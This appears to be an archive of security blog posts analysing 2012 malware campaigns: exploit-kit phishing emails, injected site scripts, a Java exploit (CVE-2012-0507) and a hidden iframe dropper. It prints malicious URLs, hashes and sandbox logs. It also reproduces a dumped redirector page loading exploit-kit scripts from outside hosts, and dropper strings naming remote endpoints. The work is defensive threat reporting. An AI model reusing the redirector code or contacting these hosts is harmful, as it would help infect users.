Tag Archives: exploit

WordPress-how-to-videos(dot)com Spreads Java Exploits

When we analyzed few Twitter followers in one of our websites, we noted that there was an user that was following us, see the image:

We have analyzed the website (infected):

www (dot) wordpress-how-to-videos (dot) com

The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server machine is located in Switzerland (CH) and in the same server there are hosted other 0 websites. The domain is registered with the suffix COM and the keyword of the domain is wordpress-how-to-videos. The organization is hosttech GmbH.

The above website is used to redirect users to a malicious URL that tries to exploit the user’s browser with a Java exploit, as you can see from this image:

Java Exploit

The malicious redirect is activated only if the user browse the malicious website with a referer that contains the string of search engines, such as Google. Using the free service HTML Sniffer we can simulate the Google referer and we can see that we are redirected to the exploit URL:

The exploit URL seems to be updated very frequently:

garliccommercial .ru /pavilion?8
midwaydance .ru /pavilion?8

Both malicious URLs are hosted in this IP address:

206.53.52 .13

The Java exploit is loaded from another malicious URL:

ypcbpukqt. lflinkup .com /PJeHubmUDaovPDRCJxGMEzlYXdvvppcg

Pay attention when clicking on websites of your Twitter followers!

Amazon.com Order Confirmation leads to Blackhole Exploit Kit

We received few emails with subject:

Amazon.com Order Confirmation

Inside the email message there is a HREF link that redirects users to a malicious web page containing malicious javascript code used to redirect users to the main URL of Blackhole exploit kit:

Amazon.com fake order page

The Blackhole exploit kit URL is:

GET /main.php?page=017f3bb5c2be6a41 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adnroidsoft .net

Fortunately the domain is not anymore active.

New Malicious Injected Code: Injection_head and Injection_tail

We have logged few websites infected with a new injected javascript code that seems to target mainly the websites powered with WordPress and Joomla. Below there is a screenshot of the malicious script:

Image

As we can see from the image above, the injected code starts with:

<!--Injection_head[SessionID=...]-->

And it ends with:

<!--Injection_tail[SessionID=...]-->

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that looks like to be sent by LinedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body contains also few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clear a Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits the vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507), more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

Com.Br Websites Infected with Maliciour JS Code (count18.php)

Our sandbox has logged various domains with suffix .COM.BR infected with a malicious obfuscated javascript code, that is injected at begin of the HTML pages of the websites, before the initial <html> tag:

Obfuscated JS code

The malicious script redirects the users to a malicious URL:

hxxp:// bylviha .ru/count18.php

An example of websites infected:

hxxp:// carboniferacatarinense .com .br/
hxxp:// www. csir-iir. org/
hxxp:// www. terapets .com/

Sometimes the malicious script is injected inside the <title> tag:

JS Injected in Title TAG

URLVoid reports of malicious domains:

http://www.urlvoid.com/scan/bylviha .ru
http://www.urlvoid.com/scan/carboniferacatarinense .com .br
http://www.urlvoid.com/scan/csir-iir. org
http://www.urlvoid.com/scan/terapets .com

Express LinkedIn Mail: spread Blackhole Exploit Kit URLs

We have received few emails that looked like to be sent from LinkedIn:

Email

But after checking email header details it was clearly a spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail

The A HREF links redirect to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like:

Dumped Content

That content looks like the spread-style of Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Pay always attention when opening known and unknown emails:

1) Always analyze email headers to see who sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid to open emails that have subject related to pharmaceutical products
5) Avoid to open emails that have subject related to sexual content
6) When emails are from your Bank, always call your Bank before open the email

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this:

Your updated information is necessary

A screenshot of the email:

Image

Other details of the emails:

Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary

The link present in the email:

hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq

Redirects users to the malicious link:

hxxp://circutor .com/4ethe8ep/index.html

The dumped content of the malicious link is:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
 
</html>

Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:

hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js

We have analyzed the malicious link with our sandbox, and this is the report:

Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7
File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - -
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - -
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\
File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes
Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - -
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - /
Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80

Malicious urls extracted:

diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf

As we can see, malicious code is injected in the system process wuauclt.exe:

Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php

Blackhole exploit kit requests:

matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf

Download dumped network traffic (password is urlvoid.com):

sniffed.zip / 17 KB

Hidden Iframe in MineCraftForum.Net

Users have reported us another website infected by an hidden iframe:

hxxp://www.minecraftforum.net/

All web pages are affected!

Here is an image of the hidden iframe at the bottom of the HTML pages:

Image

When I visted the infected website, NoVirusThanks EXE Radar Pro has displayed an alert of an unknown executable that tried to run in the system:

C:\Documents and Settings\User\Local Settings\Temp\scvhost.exe

Report date: 2011-06-22 11:34:41 (GMT 1)
File name: scvhost-exe
File size: 18944 bytes
MD5 hash: 5e71723d34d10648ed880af8e564f63b
SHA1 hash: 1af3dcb235e0a16eb58cebdbc0b9fb6316dc2f3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Thanks to NoVirusThanks EXE Radar Pro, I was able to block and delete the unknown and malicious executable file, preventing the system from being infected.

Some ASCII strings extracted from the PE file:

Type: ASCII
RVA: 00006CE2
Offset: 000040E2
Size: 0000000D
Value: GuardCore.dll
 
Type: ASCII
RVA: 00006EBC
Offset: 000042BC
Size: 00000024
Value: hxxp://www.dashangu.com/new/getw.asp
 
Type: ASCII
RVA: 00006EFF
Offset: 000042FF
Size: 00000006
Value: server
 
Type: ASCII
RVA: 00006F14
Offset: 00004314
Size: 0000000E
Value: WTF\Config.wtf
 
Type: ASCII
RVA: 00006F24
Offset: 00004324
Size: 0000000A
Value: realmName 
 
Type: ASCII
RVA: 00006F35
Offset: 00004335
Size: 00000005
Value: Right
 
Type: ASCII
RVA: 00006F4C
Offset: 0000434C
Size: 00000024
Value: hxxp://www.dashangu.com/new/getr.asp
 
Type: ASCII
RVA: 00006F74
Offset: 00004374
Size: 00000011
Value: JAGEXLAUNCHER.EXE
 
Type: ASCII
RVA: 00006F88
Offset: 00004388
Size: 00000007
Value: WOW.EXn
 
Type: ASCII
RVA: 00006F90
Offset: 00004390
Size: 00000007
Value: WinInet

URLVoid domain analysis:

http://www.urlvoid.com/scan/minecraftforum.net

16:38PM UPDATE:

The website looks like to be in maintenance now, so probably it will be fixed soon.